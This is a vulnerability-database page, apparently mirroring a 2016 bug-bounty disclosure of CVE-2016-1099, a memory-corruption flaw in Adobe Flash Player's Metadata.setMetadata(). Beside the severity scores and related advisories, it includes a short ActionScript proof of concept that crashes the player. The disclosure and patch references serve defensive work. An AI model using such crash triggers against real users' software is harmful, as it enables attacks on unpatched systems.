Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneHhj4ckH1:138517
HistoryMay 13, 2016 - 1:12 a.m.

Internet Bug Bounty: Adobe Flash Player Metadata class Memory Corruption Vulnerability

2016-05-1301:12:37
hhj4ck
hackerone.com
37

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.008 Low

EPSS

Percentile

79.1%

JSON

I. Summary
Adobe Flash Player is prone to a vulnerability which leads to memory corruption because of improper validation of Metadata.setMetadata().

II. Description
Adobe Flash is a multimedia and software platform used for authoring of vector graphics, animation, games and rich Internet applications (RIAs) that can be viewed, played and executed in Adobe Flash Player.

Normally, setMetadata() should validates its parameter and returns error in AS3 level if anything goes wrong.
If setMetadata() function is invoked directly with invalid parameter, some inner class instance will be absent, which will cause a memory crash.

POC Source Code:

package
{
import com.adobe.tvsdk.mediacore.metadata.Metadata;
import flash.display.Sprite;

public class poc extends Sprite
{
	public function poc()
	{
		var mt:Metadata;
		new Metadata().setMetadata("test",mt);
	}
}

}

Latest version of Adobe Flash Player has been tested under Windows 7 x64.

III. Impact
Memory Corruption

IV. Affected
Adobe Flash Player 21.

V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.

It has been assigned as CVE-2016-1099 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-15.html

Related

prion 6
ubuntucve 6
checkpoint_advisories 1
redhatcve 6
cve 6
archlinux 2
altlinux 2
openvas 11
kaspersky 1
mageia 1
mscve 1
nessus 12
redhat 1
freebsd 1
suse 1
prion
prion
Code injection
2016-05-11 11:00:00
Memory corruption
2016-06-16 14:59:00
Memory corruption
2016-06-16 14:59:00
ubuntucve
ubuntucve
CVE-2016-1099
2016-05-11 00:00:00
CVE-2016-4162
2016-06-16 00:00:00
CVE-2016-4163
2016-06-16 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe Flash Player Memory Corruption (APSB16-15: CVE-2016-1099)
2016-05-25 00:00:00
redhatcve
redhatcve
CVE-2016-1099
2016-05-12 16:18:45
CVE-2016-4160
2016-06-06 07:48:30
CVE-2016-4162
2016-06-06 07:48:39
cve
cve
CVE-2016-1099
2016-05-11 11:00:00
CVE-2016-4160
2016-06-16 14:59:00
CVE-2016-4120
2016-06-16 14:59:00
archlinux
archlinux
flashplugin: arbitrary code execution
2016-05-12 00:00:00
lib32-flashplugin: arbitrary code execution
2016-05-12 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt62
2016-05-13 00:00:00
Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt62
2016-05-13 00:00:00
openvas
openvas
Adobe Air Security Update (APSB16-15) - Mac OS X
2016-05-13 00:00:00
Mageia: Security Advisory (MGASA-2016-0173)
2022-01-28 00:00:00
Adobe Air Security Update (APSB16-15) - Windows
2016-05-13 00:00:00
kaspersky
kaspersky
KLA10810 Code execution vulnerabilities in Adobe Flash Player
2016-05-12 00:00:00
mageia
mageia
Updated flash-player-plugin packages fix security vulnerability
2016-05-12 23:00:19
mscve
mscve
March 2016 Adobe Flash Security Update
2016-05-10 07:00:00
nessus
nessus
FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)
2016-06-20 00:00:00
Flash Player < 11.2.202.621 / 18.0.0.352 / 21.0.0.242 Multiple Vulnerabilities (APSB16-15)
2016-06-15 00:00:00
Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)
2016-05-16 00:00:00
redhat
redhat
(RHSA-2016:1079) Critical: flash-plugin security update
2016-05-13 00:00:00
freebsd
freebsd
flash -- multiple vulnerabilities
2016-05-12 00:00:00
suse
suse
Security update for flash-player (important)
2016-05-16 18:08:08

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.008 Low

EPSS

Percentile

79.1%

JSON
Related for H1:138517
prion6ubuntucve6checkpoint_advisories1redhatcve6cve6archlinux2altlinux2openvas11kaspersky1mageia1mscve1nessus12redhat1freebsd1suse1